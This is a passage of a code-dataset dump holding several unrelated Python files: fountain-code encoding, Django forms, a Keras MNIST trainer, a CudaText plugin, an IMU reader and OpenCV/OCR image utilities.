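import heapq

def mergeSortedArrays(arrays):
    return list(heapq.merge(*arrays))

arrays = [[1, 5, 9, 21], [-1, 0], [-124, 81, 121], [3, 6, 12, 20, 150]]
assert mergeSortedArrays(arrays) == [-124, -1, 0, 1, 3, 5, 6, 9, 12, 20, 21, 81, 121, 150]
# -------------------------------------------------------------------------------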
\"kasit\": getId['King Abdulla II School For Information Technology'],\n \"medicine\": getId['School of Medicine'],\n \"engineering\": getId['School of Engineering'],\n \"shareeah\": getId['School of Sharia'],\n \"business\": getId['School of Business'],\n \"law\": getId['School of Law'],\n \"kitchen\": getId['Community Restaurant'],\n \"educational\" : getId['School of Educational Sciences'],\n 'nursing': getId['School of Nursing'],\n 'pharamcy': getId['School of Pharmacy'],\n 'dentistry' : getId['School of Dentistry'],\n 'rehabilitation' : getId['School of Rehabilitation Sciences'],\n 'arts - design' : getId['School of Arts and Design'],\n 'languages' : getId['School of Foreign Languages'],\n 'arts' : getId['School of Arts'],\n 'science' : getId['School of Science'],\n }\n\n print(faculties_ids)\n\n# patch tf1 into `utils.ops`\nutils_ops.tf = tf.compat.v1\n# Patch the location of gfile\ntf.gfile = tf.io.gfile\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = \"C:\\\\Users\\\\Hussa\\\\Desktop\\\\TF2\\\\Experiment\\\\labelmap.pbtxt\"\ncategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=False)\n# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.\ndef run_inference_for_single_image(model, image):\n image = np.asarray(image)\n # The input needs to be a tensor, convert it using `tf.convert_to_tensor`.\n input_tensor = tf.convert_to_tensor(image)\n # The model expects a batch of images, so add an axis with `tf.newaxis`.\n input_tensor = input_tensor[tf.newaxis,...]\n # Run inference\n model_fn = model.signatures['serving_default']\n output_dict = model_fn(input_tensor)\n # All outputs are batches tensors.\n # Convert to numpy arrays, and take index [0] to remove the batch dimension.\n # We're only interested in the first num_detections.\n num_detections = int(output_dict.pop('num_detections'))\n output_dict = {key:value[0, :num_detections].numpy() \n for key,value in output_dict.items()}\n output_dict['num_detections'] = num_detections\n\n score = output_dict['detection_scores'][0]\n print(score)\n if score < MIN_DETECTION_SCORE:\n return \"none\" \n \n return category_index[output_dict['detection_classes'][0]]['name']\n \ndef return_faculty_id(image):\n #return the name of the faculty \n name = run_inference_for_single_image(Model.detection_model, image)\n\n #remove any numbers inside name \n name = re.sub('[123]', '', name)\n name = name.lower()\n \n return Model.faculties_ids[name]\n ","repo_name":"hussamoq/django","sub_path":"test_project/core/aiModel.py","file_name":"aiModel.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"392251093","text":"from soliton import soliton\nimport random\nfrom math import ceil, floor\nimport sys\nfrom pprint import pprint as pp\n\ndef lt_encode(source, blocksize=1024):\n prng = random.Random()\n n = len(source)\n N = int(ceil(n/blocksize))\n #print(n)\n #print(N)\n s = soliton(N, prng.randint(0, 2 ** 32 - 1))\n while 1:\n d = next(s)\n seed = prng.randint(0, 2 ** 32 - 1)\n rng = random.Random(seed)\n r = bytearray(blocksize)\n for k in rng.sample(range(N), d):\n #sys.stdout.write(\"{:d}\\t\".format(k))\n offset = k*blocksize\n j = 0\n end = min(offset + blocksize, n)\n while offset < end:\n r[j] ^= source[offset]\n offset += 1\n j += 1\n \n #sys.stdout.write(\"\\n\");\n yield {\"degree\": d, \"seed\": seed, \"data\": 
r}\n\ndef pop(s):\n    while len(s):\n        yield s.pop()\n\ndef pop_edges(s):\n    while len(s.edges):\n        e = s.edges.pop()\n        e.edges.remove(s)\n        yield e\n\nclass node_original:\n    def __init__(self, parent, original, i, blocksize=1024):\n        self.parent = parent\n        self.known = False\n        self.i = i\n        self.edges = set() # Set of droplets associated with this block\n        self.blocksize = blocksize\n\n        offset = i*blocksize\n        end = offset + blocksize if offset + blocksize <= parent.n else parent.n\n        self.data = memoryview(original)[i*blocksize:(i+1)*blocksize]\n    \n    def pop_edges(self):\n        while len(self.edges):\n            e = self.edges.pop()\n            e.edges.remove(self)\n            yield e\n\n    def process(self):\n        assert(self.known)\n        for d in pop_edges(self): # d is for droplet\n            for j in range(self.blocksize):\n                d.data[j] ^= self.data[j]  # memoryview indexing yields an int on Python 3.3+\n            if len(d.edges) == 1:\n                d.process()\n\nclass node_droplet:\n    def __init__(self, parent, original_nodes, N, blocksize, degree, seed, data):\n        self.parent = parent\n        self.seed = seed\n        self.data = bytearray(data)\n        self.edges = set()\n\n        rng = random.Random(seed)\n\n        for k in rng.sample(range(N), degree):\n            #sys.stdout.write(\"{:d}\\t\".format(k));\n            if not original_nodes[k].known:\n                self.edges.add(original_nodes[k])\n                original_nodes[k].edges.add(self)\n            else:\n                for j in range(blocksize):\n                    self.data[j] ^= original_nodes[k].data[j]\n\n        # assert(len(self.edges) == degree) - This isn't true for recurring indices.\n\n        #sys.stdout.write(\"\\n\");\n\n        #for e in self.edges:\n            #sys.stdout.write(\"{:d}\\t\".format(e.i))\n\n        #sys.stdout.write(\"\\n\");\n\n        if len(self.edges) == 1:\n            self.process()\n\n    def process(self):\n        #print(len(self.edges))\n        assert(len(self.edges) == 1)\n        #print(\"Processing node {:d}...\".format(self.seed))\n        e = self.edges.pop() # Reference to original\n        e.edges.remove(self)\n        if not e.known:\n            e.data[:] = self.data\n            e.known = True\n            self.parent.unknown_blocks -= 1\n            e.process()\n\n\nclass lt_decode:\n    def __init__(self, n, blocksize=1024):\n        self.N = int(ceil(n/blocksize))\n        self.blocksize = blocksize\n        self.n = n\n        self.original = bytearray(self.N*self.blocksize)\n        self.unknown_blocks = self.N\n        self.original_nodes = []\n        #self.droplets = []\n\n        for i in range(self.N):\n            self.original_nodes.append(node_original(self, self.original, i, blocksize))\n\n    def catch(self, droplet):\n        n = node_droplet(self, self.original_nodes, self.N, self.blocksize,\n                         droplet['degree'], droplet['seed'], droplet['data'])\n        #self.droplets.append(node_droplet(self, self.original_nodes, self.N, self.blocksize,\n        #                                  droplet['degree'], droplet['seed'],\n        #                                  droplet['data']))\n\nif __name__ == \"__main__\":\n    #from pprint import pprint as pp\n    #with open('hello.bin', 'rb') as f:\n    with open('testfile.bin', 'rb') as f:\n        buf = f.read()\n\n    fountain = lt_encode(buf)\n    bucket = lt_decode(len(buf))\n\n    i = 0\n    while bucket.unknown_blocks > 0:\n        i += 1\n        bucket.catch(next(fountain))\n        print(\"Caught {:d} droplets. 
There are {:d} unknown blocks.\".format(i, bucket.unknown_blocks),\n              end='\\r')\n\n    assert(bucket.original == buf)\n    print(\"Decoded message of {:d} blocks using {:d} droplets ({:f}%).\".format(bucket.N, i, (i*100)/bucket.N))\n","repo_name":"alexchamberlain/socket","sub_path":"fountain/lt.py","file_name":"lt.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"31"} +{"seq_id":"9864262868","text":"import pandas as pd\ntrain_data_path=\"home-data/train.csv\"\ntest_data_path=\"home-data/test.csv\"\ntrain_data=pd.read_csv(train_data_path)\ntest_data=pd.read_csv(test_data_path)\nprint(train_data.describe())\ny_train=train_data.SalePrice\nfeatures=['LotArea','YearBuilt','1stFlrSF','2ndFlrSF','FullBath','BedroomAbvGr','TotRmsAbvGrd']\nX_train=train_data[features]\nprint(X_train.head())\nprint(X_train.describe())\nprint(y_train.describe())\n\n# note: assumes test.csv also provides a SalePrice column for evaluation\ny_test=test_data.SalePrice\nX_test=test_data[features]\nprint(X_test.head())\nprint(X_test.describe())\nprint(y_test.describe())\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.ensemble import RandomForestRegressor\n\nforest_model=RandomForestRegressor(random_state=1)\nforest_model.fit(X_train,y_train)\npredict_y=forest_model.predict(X_test)\nmae=mean_absolute_error(y_test,predict_y)\nprint(mae)\n","repo_name":"smn57958/HousingAnalysisML","sub_path":"learnML_RandomForestTestData.py","file_name":"learnML_RandomForestTestData.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35084306761","text":"from django import forms\nfrom peserta.models import Peserta, Program, Trainer, Kelas, Pendaftaran\nfrom django.contrib.auth.forms import UserCreationForm\n\n# class TrainerUserForm(UserCreationForm):\n\n\nclass TrainerForm(forms.ModelForm):\n    class Meta:\n        model = Trainer\n        exclude = ('user',)\n        widgets = {\n            'tgl_lahir': forms.DateInput(attrs={'class':'form-control', 'type':'date'}),\n        }\n\n    def __init__(self, *args, **kwargs):\n        super(TrainerForm, self).__init__(*args, **kwargs)\n\n        for visible in self.visible_fields():\n            visible.field.widget\\\n                .attrs['class'] = 'form-control input-sm'\n\n\nclass FormPeserta(forms.ModelForm):\n    program_query = Program.objects.all().order_by('nama_program')\n    program = forms.ModelChoiceField(queryset=program_query)\n\n    class Meta:\n        model = Peserta\n        exclude = ('user',)\n        widgets = {\n            'tgl_lahir': forms.DateInput(attrs={'class':'form-control', 'type':'date'}),\n        }\n\n    def __init__(self, *args, **kwargs):\n        super(FormPeserta, self).__init__(*args, **kwargs)\n\n        for visible in self.visible_fields():\n            visible.field.widget\\\n                .attrs['class'] = 'form-control input-sm'\n\n\nclass ProgramForm(forms.ModelForm):\n    class Meta:\n        model = Program\n        fields = '__all__'\n\n    def __init__(self, *args, **kwargs):\n        super(ProgramForm, self).__init__(*args, **kwargs)\n\n        for visible in self.visible_fields():\n            if visible.name == \"name\":\n                visible.field.widget\\\n                    .attrs['autofocus'] = 'autofocus'\n\n            visible.field.widget\\\n                .attrs['class'] = 'form-control input-sm'\n\n\nclass KelasForm(forms.ModelForm):\n    class Meta:\n        model = Kelas\n        fields = '__all__'\n        widgets = {\n            'tgl_mulai': forms.DateInput(attrs={'class':'form-control', 'type':'date'}),\n            'tgl_berakhir': forms.DateInput(attrs={'class':'form-control', 'type':'date'}),\n            \n        }\n\n    def __init__(self, *args, **kwargs):\n        super(KelasForm, self).__init__(*args, **kwargs)\n\n        
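# --- editorial sketch (assumption about the missing soliton module) -----------
# lt.py above imports soliton(N, seed) from a module that is not part of this
# dump and draws one degree per droplet with next(s). LT codes conventionally
# sample degrees from a soliton distribution; a generator for the *ideal*
# soliton (rho(1) = 1/N, rho(d) = 1/(d*(d-1)) for d = 2..N) matching the call
# pattern used above:
import random

def soliton(N, seed=None):
    rng = random.Random(seed)
    degrees = list(range(1, N + 1))
    weights = [1.0 / N] + [1.0 / (d * (d - 1)) for d in range(2, N + 1)]
    while True:
        yield rng.choices(degrees, weights)[0]

s = soliton(16, seed=42)
assert 1 <= next(s) <= 16
# (production LT codes usually prefer the robust soliton distribution)
# -------------------------------------------------------------------------------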
self.fields['trainer']\\\n .queryset = Trainer.objects.all()\n\n self.fields['pendaftaran']\\\n .queryset = Pendaftaran.objects.filter(is_register=True)\n\n \n for visible in self.visible_fields():\n if visible.name == \"trainer\":\n visible.field.widget\\\n .attrs['multiple'] = 'multiple'\n\n visible.field.widget\\\n .attrs['class'] = 'form-control input-sm'\n\n\nclass TambahPendaftaranForm(forms.Form):\n \n program_query = Program.objects.all().order_by('nama_program')\n program = forms.ModelChoiceField(queryset=program_query)\n keterangan = forms.CharField(max_length=255, label='keterangan')\n\n def __init__(self, *args, **kwargs):\n super(TambahPendaftaranForm, self).__init__(*args, **kwargs)\n \n for visible in self.visible_fields():\n visible.field.widget\\\n .attrs['class'] = 'form-control input-sm'\n","repo_name":"IbadMukrom/COURSES-ITEC-APPS","sub_path":"peserta/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10214390579","text":"import keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\nimport pysnooper\nimport keras_to_savedmodel\nimport ai_platform\nimport os\n\n@pysnooper.snoop()\ndef get_data(num_classes):\n # input image dimensions\n img_width, img_height = 28, 28\n\n # the data, split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n print(x_train.shape)\n\n if K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_width, img_height)\n x_test = x_test.reshape(x_test.shape[0], 1, img_width, img_height)\n input_shape = (1, img_width, img_height)\n else:\n x_train = x_train.reshape(x_train.shape[0], img_width, img_height, 1)\n x_test = x_test.reshape(x_test.shape[0], img_width, img_height, 1)\n input_shape = (img_width, img_height, 1)\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n print('x_train shape:', x_train.shape)\n print(x_train.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n return x_train, y_train, x_test, y_test, input_shape\n\n@pysnooper.snoop()\ndef get_model(input_shape, num_classes, x_train, y_train, x_test, y_test, filename):\n batch_size = 128\n epochs = 3\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes, activation='softmax'))\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\n\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test))\n model_json = model.to_json()\n\n with open(f\"{filename}.json\", \"w\") as json_file:\n json_file.write(model_json)\n model.save_weights(f'{filename}.h5')\n\n\ndef run():\n num_classes = 10\n export_path = \"trained_model\"\n deployment_uri = \"gs://antsa-demo-devfest/trained_model\"\n model_name = \"mnist\"\n 
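# --- editorial sketch (assumption: keras_to_savedmodel is not in this dump) ---
# mnist.py here saves the architecture as JSON and the weights as HDF5, then
# calls keras_to_savedmodel.convert(weights, json, export_path) below. A
# plausible minimal implementation under those assumptions (TF2-style export,
# not the repo's actual helper):
import tensorflow as tf
from keras.models import model_from_json

def convert(weights_path, json_path, export_dir):
    with open(json_path) as f:
        model = model_from_json(f.read())   # rebuild the architecture
    model.load_weights(weights_path)        # restore the trained weights
    tf.saved_model.save(model, export_dir)  # write a TF SavedModel directory
# -------------------------------------------------------------------------------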
model_version = \"v1\"\n project_id = \"antsa-demo-devfest\"\n filename = \"mnist_model\"\n x_train, y_train, x_test, y_test, input_shape = get_data(num_classes)\n get_model(input_shape, num_classes, x_train, y_train, x_test, y_test, filename)\n keras_to_savedmodel.convert(f'{filename}.h5', f'{filename}.json', export_path)\n ai_platform.create_model_version(model_name, model_version, project_id, deployment_uri)\n\n","repo_name":"antsarandriamihaja/demo-devfest","sub_path":"model/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26790100634","text":"import os\nfrom datetime import datetime\nfrom time import time, strftime, gmtime\nimport locale\nimport cudatext as app\nfrom cudatext import ed\nfrom cudax_lib import get_translation\n\n_ = get_translation(__file__) # i18n\n\nDEF_CONFIG = '''#Documentation about formats: http://strftime.org/\n%d/%m/%Y %H:%M:%S\n%d.%m.%Y\n%Y.%m.%d\n%d %B %Y\n%d %b %Y\n%A %d %B %Y\n%H:%M:%S\nrfc\nunix\n'''\n\nini = os.path.join(app.app_path(app.APP_DIR_SETTINGS), 'cuda_insert_time.ini')\nif not os.path.isfile(ini):\n with open(ini, 'w') as f:\n f.write(DEF_CONFIG)\n\nCOMMENT_CHAR = '#'\nDEFAULT_CHAR = '@'\n\n\ndef get_format_lines():\n with open(ini, 'r') as f:\n res = f.read().splitlines()\n res = [s.lstrip(DEFAULT_CHAR) for s in res if s and not s.startswith(COMMENT_CHAR)]\n return res\n\ndef get_default_format():\n with open(ini, 'r') as f:\n res = f.read().splitlines()\n res = [s.lstrip(DEFAULT_CHAR) for s in res if s and s.startswith(DEFAULT_CHAR)]\n if res:\n return res[0]\n\ndef do_format(s):\n if s=='rfc':\n return strftime(\"%a, %d %b %Y %H:%M:%S +0000\", gmtime())\n if s=='unix':\n return str(int(time()))\n t = datetime.now()\n return t.strftime(s)\n\n\nclass Command:\n\n def config(self):\n\n if os.path.isfile(ini):\n app.file_open(ini)\n\n def do_insert(self, s):\n\n x, y, x1, y1 = ed.get_carets()[0]\n if y1>=0:\n if (y, x)>(y1, x1):\n x, y, x1, y1 = x1, y1, x, y\n ed.set_caret(x, y)\n ed.replace(x, y, x1, y1, s)\n else:\n ed.insert(x, y, s)\n\n ed.set_caret(x+len(s), y)\n app.msg_status(_('Date/time inserted'))\n\n\n def dialog(self):\n\n self.fix_locale()\n lines = get_format_lines()\n lines = [do_format(s) for s in lines]\n\n res = app.dlg_menu(app.DMENU_LIST, lines, caption=_('Insert Time'))\n if res is None: return\n self.do_insert(lines[res])\n\n\n def ins_default(self):\n\n self.fix_locale()\n fmt = get_default_format()\n if not fmt:\n app.msg_box(_('No default time format is specified. 
To specify it, open config file (menu Options / Settings-plugins / Insert Time), and prefix some format with @ char.'),\n                    app.MB_OK+app.MB_ICONINFO)\n            return\n\n        self.do_insert(do_format(fmt))\n\n\n    def fix_locale(self):\n\n        locale.setlocale(locale.LC_ALL, '')\n","repo_name":"Alexey-T/CudaText","sub_path":"app/cudatext.app/Contents/Resources/py/cuda_insert_time/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":2124,"dataset":"github-code","pt":"31"} +{"seq_id":"36855561466","text":"from hipnuc_module import *\nimport time\nimport numpy as np\n\ng = 2**10\na_g = 9.81/g\n\ncount = 0\nif __name__ == '__main__':\n\n    HI221GW_A = hipnuc_module('COM20', 115200, './config.json')\n\n    t_end = time.time() + 20\n    while t_end > time.time():\n        count += 1\n        # data = HI221GW_A.get_module_data()['euler']\n        data = HI221GW_A.get_module_data()\n        # data = list(data)\n        # acc = np.array(data)*a_g\n\n        print(data)\n\n    print(count)\n    HI221GW_A.close()\n    exit()\n","repo_name":"Pna2791/HiPNUC-Hi229","sub_path":"Get_RAW.py","file_name":"Get_RAW.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"18540007911","text":"from PIL import Image\nfrom PIL import ImageChops\nfrom PIL import ImageMath\nfrom PIL import ImageOps\nimport 
darkPixelCounter/float(overallPixelCounter)\n\ndef imageMultiply(img1, img2):\n    img1 = img1.convert(\"1\")\n    img2 = img2.convert(\"1\")\n    solution = ImageChops.multiply(img1, img2)\n    solution.convert(\"RGBA\")\n    solution.show()\n\ndef imageUnion(probImg, probImg2):\n\n    probImg = probImg.convert(\"1\")\n    probImg2 = probImg2.convert(\"1\")\n    solved = ImageChops.logical_and(probImg, probImg2)\n\n    solved = solved.convert(\"RGBA\");\n\n    return solved\n\n# solved = imageUnion(problemImageA, problemImageB)\n#\n# problemImageE.show()\n# problemImageH.show()\n#\n# print(calc_root_mean_square_diff(problemImageE, problemImageH))\n\n\n\n\n# imageMultiply(problemImageG, problemImageH)\n# dprRatioA = calculate_dark_pixel_ratio_of_image(problemImageA)\n# dprRatioB = calculate_dark_pixel_ratio_of_image(problemImageB)\n# dprRatioC = calculate_dark_pixel_ratio_of_image(problemImageC)\n# dprRatioD = calculate_dark_pixel_ratio_of_image(problemImageD)\n# dprRatioE = calculate_dark_pixel_ratio_of_image(problemImageE)\n# dprRatioF = calculate_dark_pixel_ratio_of_image(problemImageF)\n# dprRatioG = calculate_dark_pixel_ratio_of_image(problemImageG)\n# drpRatioH = calculate_dark_pixel_ratio_of_image(problemImageH)\n#\n# dprSubtractLastRow = abs(dprRatioG - drpRatioH)\n#\n# print('The DPR for G is ' + str(dprRatioG))\n# print('The DPR for H is ' + str(drpRatioH))\n#\n#\n# print('DPR subtraction of last row is ' + str(dprSubtractLastRow))\n#\n# dprRatio1 = calculate_dark_pixel_ratio_of_image(solutionImage1)\n# dprRatio2 = calculate_dark_pixel_ratio_of_image(solutionImage2)\n# dprRatio3 = calculate_dark_pixel_ratio_of_image(solutionImage3)\n# dprRatio4 = calculate_dark_pixel_ratio_of_image(solutionImage4)\n# dprRatio5 = calculate_dark_pixel_ratio_of_image(solutionImage5)\n# dprRatio6 = calculate_dark_pixel_ratio_of_image(solutionImage6)\n# dprRatio7 = calculate_dark_pixel_ratio_of_image(solutionImage7)\n# dprRatio8 = calculate_dark_pixel_ratio_of_image(solutionImage8)\n#\n# print('DPR ratio for solution image 1 ' + str(dprRatio1))\n# print('DPR ratio for solution image 2 ' + str(dprRatio2))\n# print('DPR ratio for solution image 3 ' + str(dprRatio3))\n# print('DPR ratio for solution image 4 ' + str(dprRatio4))\n# print('DPR ratio for solution image 5 ' + str(dprRatio5))\n# print('DPR ratio for solution image 6 ' + str(dprRatio6))\n# print('DPR ratio for solution image 7 ' + str(dprRatio7))\n# print('DPR ratio for solution image 8 ' + str(dprRatio8))\n","repo_name":"kpbarem/Python-Game-Code","sub_path":"helloooooo.py","file_name":"helloooooo.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19504647292","text":"import csv\n\n\n# Function that extracts the classes contained in the tsv\n\ndef estraiLabelConosciute(filePath):\n    with open(filePath) as fd:\n        rd = csv.reader(fd, delimiter=\"\\t\", quotechar='\"')\n        labelConosciute = []\n        for row in rd:\n            labelConosciute.append(row[0])\n\n        labelConosciute = list(map(int, labelConosciute))\n        return labelConosciute\n    ","repo_name":"AAndonio/Unsupervised-Feature-Selection-NDFS","sub_path":"utility/estrattoreClassiConosciute.py","file_name":"estrattoreClassiConosciute.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"it","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"28283298292","text":"import copy\nfrom datetime import datetime, timezone\nimport re\n\nimport pytesseract\nimport pytz\nfrom PIL import Image\nimport cv2\nimport 
numpy as np\nimport inspect\n\nDEBUG = 0 # textual debug information\nDEBUG_IMAGES = 0 # Display images that are to be processed or being used in some form of parsing\nDEBUG_IMAGES_DEV = 0 # Display Images with visual cues to be used in development.\n# e.g. placing markers on initial image to help with coordinates and shit\nIMG_SHOT_WAIT = False\n# Destroy the image being displayed in 200 MS. to use keyboard, Use False\nfloat_regex = re.compile(r'\\-?\\d+\\.?\\d*')\n\n\ndef get_image_size(image):\n height, width, channels = image.shape\n return {'height': height, \"width\": width}\n\n\ndef read_image(image_path):\n \"\"\"\n Read an image in cv2 format\n CV2 reads image as BGR (NOT RGB)\n :param image_path: location of image\n :return:\n \"\"\"\n image = cv2.imread(image_path)\n return image\n\n\ndef color_dict(color):\n \"\"\"\n Change RGB dictionary to list of RGB\n :param color: {'r': int, 'g': int, 'b': int}\n :return: [r,g,b]\n \"\"\"\n return [color['b'], color['g'], color['r']]\n\n\ndef crop_image(top_left, bottom_right, image):\n \"\"\"\n crop and return a subsection of an image\n :param top_left:\n :param bottom_right:\n :param image:\n :return:\n \"\"\"\n\n img = image[top_left['y']:bottom_right['y'], top_left['x']:bottom_right['x']]\n if DEBUG_IMAGES:\n show_image(img, \"Cropped Image: \")\n return img\n\n\ndef convert_color(color_from, color_to, image):\n \"\"\"\n Find a color and replace it with another color\n :param color_from: {'r': int, 'g': int,'b':int}\n :param color_to: {'r': int, 'g': int,'b':int}\n :param image: Image to do replacement in. If no image specified, original image is altered .\n :return:\n \"\"\"\n\n image[np.where((image == color_dict(color_from)).all(axis=2))] = color_dict(color_to)\n return image\n\n\ndef is_consecutive(int_list):\n \"\"\"\n Sometimes, though the probability is 1/1280 for this to happen, The middle of a page can be a straight line\n where we are trying to detect the colors.\n Since @joe will ask me again anyway, if we try 3 times to search for x moving 5 pixels to the left, I believe\n the probability of hitting a straight line three times is 1/2097152000, Hope this is a satisfactory number for you.\n :param int_list: list to check for consecutive numbers in.\n :return:\n \"\"\"\n if len(int_list) < 1 or len(int_list) == 1:\n return False\n for counter in range(len(int_list) - 1):\n if int_list[counter + 1] - int_list[counter] < 3:\n return True\n return False\n\n\ndef detect_color_location(color, image, axis):\n \"\"\"\n runs through the middle of a provided image and looks for a color.\n Returns all the x / y coordinates of a color's location.\n :param color: {'r':int[0,255], 'g':int[0,255], 'b':int[0,255]}\n :param image: Image to do an x / y search in\n :param axis: [x,y] axis\n :return: [int] pixel locations\n \"\"\"\n\n # if DEBUG_IMAGES:\n # show_image(image)\n try_count = 0 # in case of three consecutive searches in which straight lines are returned, stop\n detected_pixel_location = [] # array of pixel x or y where a particular color is located\n color = color_dict(color) # color being searched for.\n image_x = image.shape[1] # x size of image [width]\n image_y = image.shape[0] # y size of image [height]\n\n if DEBUG:\n print(\"Image Size : x = {} y = {}\".format(image_x, image_y))\n image_x_middle = int(image_x / 2)\n image_y_middle = int(image_y / 2)\n if DEBUG:\n print(\"Middle Of Image: x = {} y = {}\".format(image_x_middle, image_y_middle))\n\n if axis not in ['x', 'y']:\n return None # No axis was provided\n else:\n if 
axis in ['x', 'X']:\n\n if DEBUG_IMAGES_DEV:\n im_temp = copy.deepcopy(image)\n cv2.line(im_temp, (0, image_y_middle), (image_x, image_y_middle), (0, 0, 0), 1)\n show_image(im_temp, \"detect_color_location__X\")\n while not detected_pixel_location and try_count < 3: # empty pixel array\n for x in range(0, image_x):\n color_at_location = image[image_y_middle, x].tolist() # get color value as list of 3 integers\n if color_at_location == color:\n if DEBUG:\n print(\"Found color at : [{}, {}] : {}\".format(x, image_y_middle, color_at_location))\n detected_pixel_location.append(x)\n # if color at current location is a match to the one searching for,\n # add the x location to list.\n\n if is_consecutive(detected_pixel_location) or len(detected_pixel_location) == 0:\n # if the current search took place and ended up on a line, do the search again\n # Reset the detected_pixel_location to empty and subtract 5 pixels from y axis to more the\n # line a bit to the right and run same logic again.\n\n if DEBUG:\n print(\"Inside debug. Pizel locations: {}\".format(detected_pixel_location))\n print(\"Consecutive\\nRe-checking \")\n detected_pixel_location = []\n try_count += 1\n image_y_middle = image_y_middle - 5\n if try_count == 3:\n if DEBUG:\n print(\"Try Count Exceeded 3.\\n Failure\")\n return None\n\n if DEBUG_IMAGES:\n im_temp = copy.deepcopy(image)\n for x in detected_pixel_location:\n cv2.circle(im_temp, (x, image_y_middle), 3, (0, 0, 0))\n show_image(im_temp, \"detect_color_location_X_LOCATIONS\")\n\n elif axis in ['y', 'Y']:\n im_temp = copy.deepcopy(image)\n if DEBUG_IMAGES_DEV:\n cv2.line(im_temp, (image_x_middle, 0), (image_x_middle, image_y), (0, 0, 0), 1)\n show_image(im_temp, \"detect_color_location__Y\")\n while not detected_pixel_location and try_count < 3:\n for y in range(0, image_y):\n color_at_location = image[y, image_x_middle].tolist()\n if color_at_location == color:\n if DEBUG:\n print(\"Found color at : [{}, {}] : {}\".format(y, image_x_middle, color_at_location))\n detected_pixel_location.append(y)\n if is_consecutive(detected_pixel_location) or len(detected_pixel_location) < 1:\n if DEBUG:\n print(\"Consecutive\\nRe-checking \")\n detected_pixel_location = []\n try_count += 1\n image_x_middle = image_x_middle - 5\n if try_count == 3:\n if DEBUG:\n print(\"Try Count Exceeded 3. 
\\nFailure\")\n return None\n\n if DEBUG_IMAGES:\n im_temp = copy.deepcopy(image)\n for y in detected_pixel_location:\n cv2.circle(im_temp, (image_x_middle, y), 3, (0, 0, 0))\n show_image(im_temp, \"detect_color_location_Y_LOCATIONS\")\n return detected_pixel_location\n\n\ndef create_image_for_vertical_addition(width, height=17, character='END'):\n \"\"\"\n Creates an Image with word \"END\" written in it as a delimiter for readings.\n :param width:\n :param height:\n :param character:\n :return:\n \"\"\"\n img = np.ones((height, width, 3), np.uint8) * 255\n font = cv2.FONT_HERSHEY_DUPLEX\n bottom_left_corner_of_text = (int(width / 2) - int((width / 100) * 40), int(height / 2)\n + int((height / 100) * 40))\n font_scale = .5\n font_color = (0, 0, 0)\n line_type = 1\n cv2.putText(img, character,\n bottom_left_corner_of_text,\n font,\n font_scale,\n font_color,\n line_type)\n return img\n\n\ndef create_image_for_horizontal_addition(height, width=40, character=\"END\"):\n \"\"\"\n Create a image of specified height in white back ground and plain text written on it.\n :param height: Height of image to create\n :param width:\n :param character: Text to type\n :return:\n \"\"\"\n img = np.ones((height, width, 3), np.uint8) * 255\n font = cv2.FONT_HERSHEY_DUPLEX\n bottom_left_corner_of_text = (int(width / 2) - int((width / 100) * 40), int(height / 2))\n font_scale = .5\n font_color = (0, 0, 0)\n line_type = 1\n cv2.putText(img, character,\n bottom_left_corner_of_text,\n font,\n font_scale,\n font_color,\n line_type)\n return img\n\n\ndef stitch_image(array_of_images, orientation=\"vertical\", character='END'):\n \"\"\"\n Takes in an array of image of SAME WIDTH OR SAME HEIGHT and joins them together\n using the orientation.\n :param array_of_images:\n :param orientation:\n :param character:\n :return:\n \"\"\"\n if orientation == \"vertical\":\n height, width, _ = array_of_images[0].shape\n filler = create_image_for_vertical_addition(width, character=character)\n image = array_of_images[0]\n for images in range(1, len(array_of_images)):\n image = np.concatenate((image, filler), axis=0)\n image = np.concatenate((image, array_of_images[images]), axis=0)\n if DEBUG_IMAGES:\n show_image(image)\n return image\n\n\ndef parse_text_from_image(image, scale=2, erode=True, erode_iteration=1, erode_kernel=2, psm=6):\n \"\"\"\n 